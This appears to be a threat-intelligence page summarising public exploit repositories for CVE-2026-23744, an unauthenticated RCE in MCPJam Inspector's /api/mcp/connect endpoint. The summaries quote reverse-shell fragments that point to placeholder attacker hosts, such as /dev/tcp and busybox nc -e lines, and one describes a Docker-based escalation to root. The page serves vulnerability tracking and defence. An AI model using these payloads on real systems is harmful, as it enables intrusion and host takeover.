This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744, described as an unauthenticated command injection / remote code execution issue in MCP Connect. The repository contains only two files: a README with vulnerability description, usage, and mitigation guidance, and a single Python exploit script (cve-2026-23744.py). The script uses argparse to collect an attacker callback host (-l) and target base URL (-u), appends /api/mcp/connect to the supplied URL, and sends a JSON POST request via requests.post(..., verify=False). The malicious JSON registers an MCP server configuration with command set to bash and args containing a bash -c reverse shell one-liner that connects back to the attacker on TCP/443 using /dev/tcp. The script instructs the operator to start a netcat listener on port 443 before sending the request. There is no vulnerability check, target fingerprinting, authentication handling, or payload customization beyond the callback IP and fixed port 443. Overall, this is an operational but simple exploit that directly attempts exploitation and, if successful, yields remote shell access on the vulnerable server.
This repository is a small standalone exploit repo containing one Python exploit script and one README. The main file, CVE-2026-23744.py, is a command-line Python 3 exploit that targets MCPJam Inspector <= 1.4.2 via the /api/mcp/connect endpoint. It constructs a JSON POST body with serverConfig.command set to bash and serverConfig.args containing an attacker-controlled shell command, indicating the vulnerability is unauthenticated command execution through unsafe shell invocation in the API. The exploit is not just an RCE proof of concept; it implements a full attack chain. After achieving remote command execution, it writes a base64-encoded shell script to /tmp/.x.sh, makes it executable, and runs it through `sg docker`. The inner script launches a privileged Docker container using the image privatebin/nginx-fpm-alpine:2.0.2, mounts the host root filesystem at /mnt, chroots into the mounted host filesystem, and executes a bash reverse shell back to the attacker using /dev/tcp/<lhost>/<lport>. This is intended to escalate from the vulnerable service context to root on the host. Repository structure is minimal and purpose-built: the README explains the vulnerability, attack chain, and usage, while the Python script handles argument parsing, URL construction, payload generation, and HTTP delivery. The script supports configurable target, scheme, port, endpoint, timeout, and verbose mode. It disables TLS verification warnings and treats a read timeout as a likely successful exploit condition, which is common for reverse-shell delivery. Overall, this is an operational standalone exploit for unauthenticated network-based RCE followed by local Docker-based privilege escalation to a root reverse shell.
This repository is a minimal standalone exploit PoC for CVE-2026-23744 and contains two files: a Python exploit script and a short README with usage instructions. The main file, CVE-2026-23744.py, uses argparse to accept a target URL and attacker callback IP, then builds a curl command and executes it via subprocess.run(shell=True). The exploit sends a JSON POST request to the target endpoint /api/mcp/connect with a crafted serverConfig object that instructs the target to launch /bin/bash with arguments that execute a Bash reverse shell payload. The payload connects back to the attacker on TCP port 4444, where the operator is expected to have a netcat listener running. The script prints basic status messages and displays the HTTP response or subprocess error output. There is no detection-only logic, no framework integration, and no payload customization beyond the supplied LHOST and fixed callback port. Overall, the repository's purpose is straightforward remote code execution leading to reverse shell access against vulnerable MCPJam Inspector instances.
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector versions 1.4.2 and earlier. The repository contains only two files: a README describing the target and usage notes, and exploit.py, the sole executable entry point. The Python script accepts three arguments: target hostname/VHOST, listener IP, and listener port. It constructs a JSON object with a serverConfig field that instructs the target to run /bin/bash with a -c argument containing a BusyBox netcat reverse shell command. It then sends this payload as an HTTPS POST request to /api/mcp/connect with JSON headers and TLS verification disabled. If successful, the exploit provides remote code execution resulting in a reverse shell back to the attacker. The README indicates hostname-based targeting may require editing /etc/hosts, suggesting the application may rely on virtual host routing. There is no detection-only logic, no framework integration, and no payload customization beyond command-line listener parameters. Overall, this is a focused operational exploit script for unauthenticated or exposed API abuse leading to command execution and shell access.
This repository is a small standalone proof-of-concept exploit for a blind remote command execution issue in MCPJam Inspector. It contains two files: a README describing the vulnerability and usage, and a single Python exploit script (exploit.py). The script is the main entry point and uses the requests library to interact with the target over HTTPS while disabling certificate verification and suppressing related warnings. The exploit workflow is straightforward: it first polls https://<target> for up to 30 seconds to confirm the server is reachable, treating HTTP 200 or 404 as sufficient. It then sends a POST request to https://<target>/api/mcp/connect with a JSON body containing a crafted serverConfig object. Instead of a legitimate MCP server process, the payload forces the application to launch 'sh' with arguments ['-c', <attacker command>], resulting in arbitrary shell command execution on the host. The exploit sets DISPLAY from the local environment or defaults to :0, and uses a fixed serverId value of 'rce_test'. Capabilities are limited but practical: it provides blind RCE, meaning it can trigger command execution but does not implement reliable output retrieval. The README explicitly notes that operators should rely on side effects such as file writes, outbound callbacks, or reverse shells. Because the command is user-supplied at runtime, the exploit is more than a pure POC and is operational, though still simple and not framework-based. No persistence, privilege escalation, lateral movement, or post-exploitation automation is included. Fingerprintable elements in the code are minimal and centered on the target HTTPS root and the vulnerable /api/mcp/connect endpoint. There are no hardcoded IPs, domains, registry keys, or external C2 endpoints. Overall, the repository's purpose is to demonstrate and operationalize exploitation of unsafe process spawning through an exposed development/debug API in MCPJam Inspector.
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam inspector <= 1.4.2. The repo contains one actual code file, exploit.py, plus a README, requirements.txt, license, gitignore, and a GitHub Actions pylint workflow. The exploit is not part of a larger framework. The main exploit logic is in exploit.py. It prompts the operator for a target host, target port, listener host, and listener port. It then builds the target URL by appending /api/mcp/connect to the supplied host and port and sends a POST request with JSON data containing a serverConfig object. That object instructs the target to execute /bin/sh with arguments ['-c', payload], where payload is a reverse shell command: /bin/sh -i >& /dev/tcp/<lhost>/<lport> 0>&1. If successful, the target connects back to the attacker listener and provides shell access. Capabilities: remote unauthenticated command execution leading to a reverse shell, assuming the vulnerable endpoint is exposed and the target environment supports /bin/sh and /dev/tcp redirection. The exploit disables TLS verification (verify=False), works over HTTP or HTTPS depending on user input, and prints the HTTP response body/status after sending the payload. Fingerprintable artifacts include the vulnerable endpoint /api/mcp/connect, the executed binary /bin/sh, and the reverse-shell path /dev/tcp/<lhost>/<lport>. The README also documents operator workflow using netcat as a listener, but netcat is not invoked by the exploit itself. Overall, this is a concise operational PoC rather than a detection script: it contains a hardcoded reverse-shell payload and directly attempts exploitation.
The repository is a small HTB-oriented exploit/writeup repo with 3 files: a README, a Python exploit, and a detailed markdown walkthrough. The only code file, exploit.py, is the operational PoC. It uses Python requests to send an HTTPS POST to https://mcp.kobold.htb/api/mcp/connect with a JSON body containing serverConfig.command='bash' and arguments that execute a detached reverse shell using bash /dev/tcp. The script disables TLS verification and prints the HTTP response, but its real capability is unauthenticated remote code execution and shell access when the target is vulnerable. The exploit targets CVE-2026-23744, described in the repo as an unauthenticated RCE in MCPJam Inspector <= 1.4.2. The attack vector is network-based: the vulnerable web API accepts attacker-supplied command execution parameters without authentication. The payload is hardcoded but operator-configurable through ATTACKER_IP and ATTACKER_PORT, making it more than a simple detector and consistent with an operational PoC. Repository structure and purpose: README.md briefly states the HTB Kobold scenario and attack chain; exploit.py contains the actual PoC; writeup.md documents full reconnaissance, exploitation, and post-exploitation steps for the box. The writeup also references additional infrastructure and post-exploitation details, including kobold.htb, mcp.kobold.htb, bin.kobold.htb, backend service 127.0.0.1:6274, and a Docker-group privilege escalation path. However, those latter steps are explanatory only; the repository’s executable exploit capability is the initial unauthenticated RCE against the MCP Inspector endpoint.
This repository is a small standalone proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. It contains only two files: a README describing the vulnerability and usage, and a single Python script (exploit.py) that performs the attack. The exploit capability is straightforward: it sends an HTTP POST request to the exposed /api/mcp/connect endpoint with a crafted JSON object containing serverConfig.command set to bash and args containing a bash reverse-shell one-liner. If the target is vulnerable, the application executes the supplied command without authentication, yielding remote code execution as the user running MCPJam Inspector. Operationally, the script takes three command-line arguments: target base URL, attacker IP, and attacker port. It strips any trailing slash from the base URL, appends /api/mcp/connect, and submits the JSON payload using Python requests with TLS verification disabled. The payload is hardcoded to open a reverse shell to the supplied listener using bash -i and /dev/tcp. This makes the exploit more than a pure PoC but still relatively simple and fixed-function, so OPERATIONAL is the best maturity fit. Repository structure is minimal and purpose-built: - README.md: vulnerability description, affected versions, example invocation, and advisory reference. - exploit.py: main exploit entry point implementing the unauthenticated POST request and reverse-shell payload delivery. There is no framework usage, no modularization, and no detection-only logic. The code is a direct exploitation script intended to achieve immediate command execution and shell access against exposed vulnerable MCPJam Inspector instances.
This repository is a small standalone Python proof-of-concept exploit for the claimed CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. The repository contains one executable exploit script (CVE-2026-23744.py), a short README, a requirements file, and a license. The script is not part of a larger exploit framework. The exploit accepts a target base URL plus attacker-controlled lhost and lport. It constructs the target endpoint by appending /api/mcp/connect to the supplied URL and sends a POST request containing a crafted JSON body. The JSON abuses a serverConfig structure to instruct the target to execute /bin/bash with attacker-controlled arguments. In the default path, the script base64-encodes a bash reverse shell command and has the target decode and execute it, producing a reverse shell to the attacker. This is a straightforward operational RCE payload rather than a mere detector. The script also includes a --test mode for blind verification. In that mode, it starts a local Python HTTP server bound to the attacker lhost on port 80, then sends a payload causing the target to run `curl http://<lhost>/rce-ok`. If the callback is received, that indicates command execution on the target. This mode is useful when a reverse shell is not desired or outbound connectivity is uncertain. Notable implementation details: TLS certificate verification is disabled (`verify=False` and urllib3 warnings suppressed), the reverse shell is hardcoded as a bash /dev/tcp one-liner, and the exploit relies on Linux-style shell features and the presence of /bin/bash and likely curl for test mode. The code structure is simple: argument parsing and payload construction at top level, `exploit()` for reverse-shell delivery, `exploit_test()` for callback-based verification, `run_server()` for the local HTTP listener, and a main block that selects test or exploit mode. There is no persistence, privilege escalation, or post-exploitation automation beyond initial code execution and shell access.
This repository is a minimal proof-of-concept exploit for CVE-2026-23744 / GHSA-232v-j27c-5pp6 affecting MCPJam Inspector. The repository contains only two files: a short README with invocation syntax and a single Python exploit script, cve-2026-23744.py, which is the clear entry point. The script uses argparse for CLI handling, requests for HTTP communication, json for payload display, and disables TLS certificate warnings to allow exploitation of HTTPS targets with invalid certificates. The exploit capability is straightforward remote code execution via a network-accessible API. It constructs a POST request to the target endpoint /api/mcp/connect and supplies a JSON body with a serverConfig object that sets command to 'busybox' and args to invoke 'nc <attacker_ip> <attacker_port> -e /bin/bash'. If the target processes these fields unsafely, it will execute the command and open a reverse shell to the attacker-controlled listener. The script prints the payload, HTTP status, and response body, and treats HTTP 200 as likely success. There is no detection-only logic, no authentication handling, no target enumeration, and no payload customization beyond attacker IP/port and target URL. Because it includes an actual reverse shell payload but is still a simple standalone script, its maturity is best classified as OPERATIONAL rather than POC-only or weaponized. The main fingerprintable target endpoint is the API path /api/mcp/connect, and the exploit also relies on a callback channel to an attacker-supplied IP and TCP port. The payload further assumes the presence of busybox, netcat, and /bin/bash on the target system.
This repository is a minimal Python proof-of-concept exploit for CVE-2026-23744, an unauthenticated remote code execution issue in MCPJam Inspector <= 1.4.2. The repository contains only two files: a README with vulnerability and usage information, and a single executable Python script. The script accepts a target base URL and an arbitrary command string, splits the command into executable plus arguments, and sends a POST request to the target's /api/mcp/connect endpoint with a crafted JSON body under serverConfig. The exploit abuses the application's MCP connection mechanism to cause the target to launch an attacker-specified command without authentication. The attack vector is network-based over HTTP(S). There is no advanced payload management, persistence, or post-exploitation logic; the exploit is straightforward and operational, suitable for direct command execution or blind/OOB verification using attacker-controlled callback URLs.
This repository is a small standalone proof-of-concept exploit for CVE-2026-23744 targeting a Linux-hosted MCP API. It contains two files: a README with setup/usage notes and one Python exploit script. The exploit is not part of a larger framework. The main logic is in exploit.py. It accepts a single target hostname argument, polls https://<target> for up to 30 seconds to confirm the server is reachable, then sends a POST request to https://<target>/api/mcp/connect. The JSON body abuses the serverConfig structure by setting command to /bin/sh and args to ['-c', '<reverse shell command>'], indicating the vulnerability is unsafe command execution through the MCP connect API. The hardcoded payload is a BusyBox netcat reverse shell: busybox nc <attacker_ip> <port> -e /bin/sh. The script suppresses TLS verification and ignores exceptions on the POST, explicitly noting that the HTTP connection may break once the shell is spawned. Repository structure is minimal and purpose-built: README.md documents dependency installation (requests), execution syntax, required operator edits for attacker_ip and port, and listener setup with netcat. It also includes an alternative FIFO-based shell payload for environments where netcat -e is unavailable. Overall, this is an operational PoC for authenticated/unauthenticated network exploitation depending on target exposure, with a fixed reverse-shell payload and no advanced post-exploitation, target discovery, or payload customization beyond editing constants in the script.
This repository is a minimal proof-of-concept exploit for CVE-2026-23744 affecting MCPJam inspector <= 1.4.2. It contains two files: a README describing the issue and usage steps, and a single Python exploit script. The script uses the requests library to send an HTTPS POST request to the target endpoint /api/mcp/connect with a JSON body containing a crafted serverConfig. That configuration specifies command execution via busybox with arguments that launch nc to connect back to an attacker-controlled IP and port and execute /bin/bash, resulting in remote code execution and a reverse shell. The exploit is straightforward and hardcoded: the operator must manually edit TARGET, ATTACKER_IP, and ATTACKER_PORT, start a listener, and run the script. There is no target discovery, authentication handling, evasion, or payload customization beyond editing constants, so it is best classified as an operational but simple POC exploit.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Unknown
A remote code execution vulnerability in MCPJam inspector (<= 1.4.2) where a crafted HTTP request can trigger installation of an MCP server, resulting in RCE; remotely reachable by default because the service listens on 0.0.0.0.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.